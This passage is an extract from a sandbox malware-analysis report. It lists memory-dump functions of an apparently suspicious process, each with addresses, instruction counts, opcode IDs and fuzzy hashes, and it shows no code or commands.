                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a4a4ae394db90c602f45f940c31a58ee2b39ae4dddc9bad661c0cc031b510523
                                                                                                                                                                          • Instruction ID: 54e8ffad272cc39485d95f1686cd2475a05b1111944913f9506aa12efaa4e781
                                                                                                                                                                          • Opcode Fuzzy Hash: a4a4ae394db90c602f45f940c31a58ee2b39ae4dddc9bad661c0cc031b510523
                                                                                                                                                                          • Instruction Fuzzy Hash: 48B1D17061A6059FEB49CF48D4E06B137A1FF49310B5142FCC84A8B69BD739FA86CB81
                                                                                                                                                                          Function 00007FFD9BBB2AF3 Relevance: .3, Instructions: 293COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a352bb8fa48e28bdde45d461f013acbb253baf4a3e65eba88ea3df363b51a259
                                                                                                                                                                          • Instruction ID: a7330bfe51643ec7ac920c647e6aa6f54b5b7e7dd0c1aa2c28f76e02ffad960e
                                                                                                                                                                          • Opcode Fuzzy Hash: a352bb8fa48e28bdde45d461f013acbb253baf4a3e65eba88ea3df363b51a259
                                                                                                                                                                          • Instruction Fuzzy Hash: 50214B11F0F2AB8AF67956E4B4754BE6F407F50318F2A01B6C45E860F6CC4D3A491B82
                                                                                                                                                                          Function 00007FFD9BF80DAE Relevance: .3, Instructions: 288COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ef45a2ada6c59df5c799e44c4ea3eb190f8f7b4700dd721d00d80fdcc21bcae7
                                                                                                                                                                          • Instruction ID: 103c0e66bae47742b8313472ee72cef5b15da0b7ea5205ec69f3b40140a39d59
                                                                                                                                                                          • Opcode Fuzzy Hash: ef45a2ada6c59df5c799e44c4ea3eb190f8f7b4700dd721d00d80fdcc21bcae7
                                                                                                                                                                          • Instruction Fuzzy Hash: 9621C813F8FA9B8AF7354AB4187297859509F41A10F5B43B6D49F860E2CC2E3A415282
                                                                                                                                                                          Function 00007FFD9BBB20B8 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8a32e832637db903d6a1c72b07c7e92c379dd51d7288fddc7dd67704abd85df
                                                                                                                                                                          • Instruction ID: 284a15fd2f2d51477c805e8f7368466b6200ebcee435d71b131b2779e64e16ad
                                                                                                                                                                          • Opcode Fuzzy Hash: c8a32e832637db903d6a1c72b07c7e92c379dd51d7288fddc7dd67704abd85df
                                                                                                                                                                          • Instruction Fuzzy Hash: 6AA1E770A0991D8FDFA4EF98D495AADBBF1FF59305F11016AD00DE72A1CA34AA85CF40
                                                                                                                                                                          Function 00007FFD9BF727DA Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5e1b6f398435471b882a0c50bfc148231c9f38c3be1ce2126041bc13fc6687f0
                                                                                                                                                                          • Instruction ID: 0b2f9bd1b77b83d3c792f1f63b8ad7a83982f4e10e9520ba9a532bcdd34efeaf
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e1b6f398435471b882a0c50bfc148231c9f38c3be1ce2126041bc13fc6687f0
                                                                                                                                                                          • Instruction Fuzzy Hash: FE91E73070EA4A4FEB59DF98C0E06A4B7A1FF1A300B4542F9C44EC7A96DB29F951C790
                                                                                                                                                                          Function 00007FFD9BF797A6 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b7b252267bf88f567f536ccb4fc8653e6a883af92c75b1dc5534d1d41227da42
                                                                                                                                                                          • Instruction ID: aa6dc9eab0727671124300c530ca8e75344b7f8ac73b0fd6f684ad85b054191b
                                                                                                                                                                          • Opcode Fuzzy Hash: b7b252267bf88f567f536ccb4fc8653e6a883af92c75b1dc5534d1d41227da42
                                                                                                                                                                          • Instruction Fuzzy Hash: 26814831B0EA4A5FF3389E5894A957577E1EF81310B1242FED08FC31A2DD2AF5028742
                                                                                                                                                                          Function 00007FFD9BBBD2A6 Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2c9ba9be9c868cb0b3df855a9f135b404bfe6c8de4b632f928c006546dec009e
                                                                                                                                                                          • Instruction ID: a3f3490cb1da071528d7f0f7be81ef98d8be806df2801767940da188e6780dbd
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c9ba9be9c868cb0b3df855a9f135b404bfe6c8de4b632f928c006546dec009e
                                                                                                                                                                          • Instruction Fuzzy Hash: D8812732B0EA5A4FF3389A68946117677E0FF55318B1605BED48EC31E3DE2CB5028B51
                                                                                                                                                                          Function 00007FFD9BBB4646 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ae2f393bd0598921cc17bff9277ae258665b935066e5fd908d4f4501cbb1b7d4
                                                                                                                                                                          • Instruction ID: 8730ab495ca8391e5e9cebee3eee6ecceef572b2fc0ad69cfcfcbc923c4353bf
                                                                                                                                                                          • Opcode Fuzzy Hash: ae2f393bd0598921cc17bff9277ae258665b935066e5fd908d4f4501cbb1b7d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 70812B31B0EA5A4FE3399B58986117677E1FF46318B16057ED08FC31E2DE18B501CB52
                                                                                                                                                                          Function 00007FFD9BBBB3E7 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c1378f7233d6a1bb091cafc381dbc7e09df44cb62cd8f686b9f716350ac0ade5
                                                                                                                                                                          • Instruction ID: 32996e4e5d5f5441122ed88bbc702fed96cde3034e389772925d4cb450398f3a
                                                                                                                                                                          • Opcode Fuzzy Hash: c1378f7233d6a1bb091cafc381dbc7e09df44cb62cd8f686b9f716350ac0ade5
                                                                                                                                                                          • Instruction Fuzzy Hash: F5710931A0E85D4FE77CDA58C8769BA37C0FF44319B160279D59EC35F2DD18AA068B82
                                                                                                                                                                          Function 00007FFD9BF75469 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f19f74edf5fbb3738d4532699c80c4aed0a09de9b57a94402edaf98e1a6f0e04
                                                                                                                                                                          • Instruction ID: ca767d4c5535a07283cf2546a1c9ca75aa0697aaf9662bd735f8cd8003eb4b3e
                                                                                                                                                                          • Opcode Fuzzy Hash: f19f74edf5fbb3738d4532699c80c4aed0a09de9b57a94402edaf98e1a6f0e04
                                                                                                                                                                          • Instruction Fuzzy Hash: 19713231A0E94D4FE778DE5888A65BC37C2EF44314B1613F9D09EC75B2DE1AEA068781
                                                                                                                                                                          Function 00007FFD9BBB2781 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1bde41c94c975b3c3e0f1406b840a642d4aa6bbf5e593e47c1125e7e41d0102e
                                                                                                                                                                          • Instruction ID: 89cb524f98305a71d5ea7d4c238c80575f9a6f96b409a91a97adf87850c516bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 1bde41c94c975b3c3e0f1406b840a642d4aa6bbf5e593e47c1125e7e41d0102e
                                                                                                                                                                          • Instruction Fuzzy Hash: 68712534B0D45D8FEB78DA88DC656AE3BC1FF58315B120279D45EC36F1CA28E9068B80
                                                                                                                                                                          Function 00007FFD9BBBBFAB Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7ff0eac6e2905633803a4982159ff4b53b4496b3c403205d8711e0c4652d21ba
                                                                                                                                                                          • Instruction ID: 4ef86d743c3872110bfcea7221ceb6d2361d43adb405cf266b46c5c56b51e397
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ff0eac6e2905633803a4982159ff4b53b4496b3c403205d8711e0c4652d21ba
                                                                                                                                                                          • Instruction Fuzzy Hash: A771F730E1E65E8FEB65DBA8C460ABE7BA0FF55304F5101BAD01ED71E2DE286941CB41
                                                                                                                                                                          Function 00007FFD9BF784AB Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fc355e9d65d1cb6f4ef10023c09ae0e2ca91e1ffd32642d35f063129dd11f3a5
                                                                                                                                                                          • Instruction ID: 6e8b829bb8243bff0e1429fbe88136a0d38767c31b4652294a5ef2f9dfb94e21
                                                                                                                                                                          • Opcode Fuzzy Hash: fc355e9d65d1cb6f4ef10023c09ae0e2ca91e1ffd32642d35f063129dd11f3a5
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E81C430E1E54E8FEBA5DFA588A46BC7BA0FF54310F1102F9D00EC71A2DE2AA9418741
                                                                                                                                                                          Function 00007FFD9BF7BA01 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fee31c705cf0e761a6728ffa09e994d8948e6db6d43dbbbcf5063d256ea0f42e
                                                                                                                                                                          • Instruction ID: d5a6a53ed9c75ffb7b12d771295bc0ffa7df77a16c403ef5eaa516722d472356
                                                                                                                                                                          • Opcode Fuzzy Hash: fee31c705cf0e761a6728ffa09e994d8948e6db6d43dbbbcf5063d256ea0f42e
                                                                                                                                                                          • Instruction Fuzzy Hash: 8791DF30A0AB0A8FE379DF58C5F457177A1FF05304B5146BDC48A87AA7CA2AF942CB41
                                                                                                                                                                          Function 00007FFD9BBB7829 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a06baf7835753e21c49995c105336439af4a7f2849092ffcd3fd687d7cde6796
                                                                                                                                                                          • Instruction ID: 3b4bee2187c08f3c9d05c5f8d49bb4a1985a416b237b890559027dc7040eb8dc
                                                                                                                                                                          • Opcode Fuzzy Hash: a06baf7835753e21c49995c105336439af4a7f2849092ffcd3fd687d7cde6796
                                                                                                                                                                          • Instruction Fuzzy Hash: 4851453160EB594FE72A8A69D8959713BE0FF56324B5601BEC0CAC71B3D929B843CB41
                                                                                                                                                                          Function 00007FFD9BF77912 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 00e7439fdae42d7b46888b3ce0897c43ffb8f361ed20550edf085980ba07a780
                                                                                                                                                                          • Instruction ID: 47ba74c0d72a633df96630b3ca3fe80347fb10ab2d5e5a0d2a2071e49d1e000b
                                                                                                                                                                          • Opcode Fuzzy Hash: 00e7439fdae42d7b46888b3ce0897c43ffb8f361ed20550edf085980ba07a780
                                                                                                                                                                          • Instruction Fuzzy Hash: BA510431B2E54D4FF778DE5888A65B577D0EF94310B0603F9D09EC35B2DA1AEA058781
                                                                                                                                                                          Function 00007FFD9BBB75F1 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6e54e4d5621189564fdc2713dd613168be1a2c7bd22696355e667ba6550dd949
                                                                                                                                                                          • Instruction ID: b075c7b3611fe834815c8fc03fce4c572251671d45dce36eb451a235c83a1319
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e54e4d5621189564fdc2713dd613168be1a2c7bd22696355e667ba6550dd949
                                                                                                                                                                          • Instruction Fuzzy Hash: C5515F70E0955D8FDF94EFA8D854AEDBBB1FF55304F11006AD00DE7296DA34A981CB40
                                                                                                                                                                          Function 00007FFD9BBBCBC9 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6027f693e81207c993319c7d8d7e1458768af271c87d07415148cb2274209d17
                                                                                                                                                                          • Instruction ID: d9c2cba7931a9ebf5d269077682a36a3c35ba8faf98938e5611ed22f9fc2a50d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6027f693e81207c993319c7d8d7e1458768af271c87d07415148cb2274209d17
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E510472F0E95E5FEB64DAA8C8615BAB7A1FF55314B05017AD04EC32D2CE24B912CB80
                                                                                                                                                                          Function 00007FFD9BF709DB Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 34d714b380876ffd75003842ebaf24710f6898f43cc54d934d9493b1c8d5010b
                                                                                                                                                                          • Instruction ID: e20d69289b0113fe33772689ad9033d04830398ddee4aa5e794fca4a2b11cd83
                                                                                                                                                                          • Opcode Fuzzy Hash: 34d714b380876ffd75003842ebaf24710f6898f43cc54d934d9493b1c8d5010b
                                                                                                                                                                          • Instruction Fuzzy Hash: 08519032E1954E8EEF65DFB8C4A05BCBBB1FF59704F1506B9D00AC72A2DA25AA41C700
                                                                                                                                                                          Function 00007FFD9BBB334B Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 24eca10c1e392851a0dd5f320b56e75bdd8adaa79cba28ff24ae80afb444cebd
                                                                                                                                                                          • Instruction ID: 7aef7499eac69f3dec6e420af78c199cf16b38c55f0f70589d0218ef90b5acaa
                                                                                                                                                                          • Opcode Fuzzy Hash: 24eca10c1e392851a0dd5f320b56e75bdd8adaa79cba28ff24ae80afb444cebd
                                                                                                                                                                          • Instruction Fuzzy Hash: 9951A031E1955E8FEB69DBA884A15FE7BB0FF54304F5501BAC00EC71E2DE286946CB40
                                                                                                                                                                          Function 00007FFD9BF7AD50 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 91a5e878032e812cf5760ed5cf30a1fccf7f89cae8426b2c99b9012778e7322d
                                                                                                                                                                          • Instruction ID: cd965117a6a756ca9bc249f200b91d5f37d31a8b4446c147e03f6d24cabbae43
                                                                                                                                                                          • Opcode Fuzzy Hash: 91a5e878032e812cf5760ed5cf30a1fccf7f89cae8426b2c99b9012778e7322d
                                                                                                                                                                          • Instruction Fuzzy Hash: A551F971A1D95E8EEB78DB5484B4BF977A1FF94300F1242F9C04EC7196CE39AA808B41
                                                                                                                                                                          Function 00007FFD9BF71DDC Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 26910472bea9ba4234ab52669e8f24e5c7cd8c96cc36716a771f3176b4e52bed
                                                                                                                                                                          • Instruction ID: 28fbcf0b9b15037b719b23f758005a3f8fab138548117efb71a73cdd247d391e
                                                                                                                                                                          • Opcode Fuzzy Hash: 26910472bea9ba4234ab52669e8f24e5c7cd8c96cc36716a771f3176b4e52bed
                                                                                                                                                                          • Instruction Fuzzy Hash: E0417B31B0E60A4FE7789D5898E247577D1EF45310B1206BEE4CFC32A2DD26FB064252
                                                                                                                                                                          Function 00007FFD9BF727F0 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 32bb1e7775d2a33239a36e838c1e86742c74023a6ba1685d792ee42827837399
                                                                                                                                                                          • Instruction ID: 577f08ba2110e8ccd0fe31fd62924bcb822b7c9911ffb36ce1dc15986cdec3db
                                                                                                                                                                          • Opcode Fuzzy Hash: 32bb1e7775d2a33239a36e838c1e86742c74023a6ba1685d792ee42827837399
                                                                                                                                                                          • Instruction Fuzzy Hash: E2519370B1A90A5BEB58EF98C0A06B5B3A1FF59300F4542B9C40EC3A96DF35F9518780
                                                                                                                                                                          Function 00007FFD9BBB6EC7 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 85d8ea6c3ff0c7750e036059c4375cac896d902ca87443ce9a56fa09a01c7d92
                                                                                                                                                                          • Instruction ID: 75854fe043a3f4c7b7e928686794c79ec3bfd1615d0dd4beefa4c33d9832ea2b
                                                                                                                                                                          • Opcode Fuzzy Hash: 85d8ea6c3ff0c7750e036059c4375cac896d902ca87443ce9a56fa09a01c7d92
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F41A43270C9198FDF98EF58C0A5DA9B3E1FBA8314B0441AAD44EC7692DE25EC55CB81
                                                                                                                                                                          Function 00007FFD9BF74537 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6e6c152ad98a153ef6a6abc2e52af7990afa3a390f86ebcb91c98b91b619ad23
                                                                                                                                                                          • Instruction ID: 74047041cf83ff2aa58009509a24a9a83e42778246bc1141b76db78aa172d32b
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e6c152ad98a153ef6a6abc2e52af7990afa3a390f86ebcb91c98b91b619ad23
                                                                                                                                                                          • Instruction Fuzzy Hash: 9241317260CA588FDF98FF5CC4A5DA5B7E1FBA9314B0501AED04AC3292DE35E845CB81
                                                                                                                                                                          Function 00007FFD9BF750F4 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
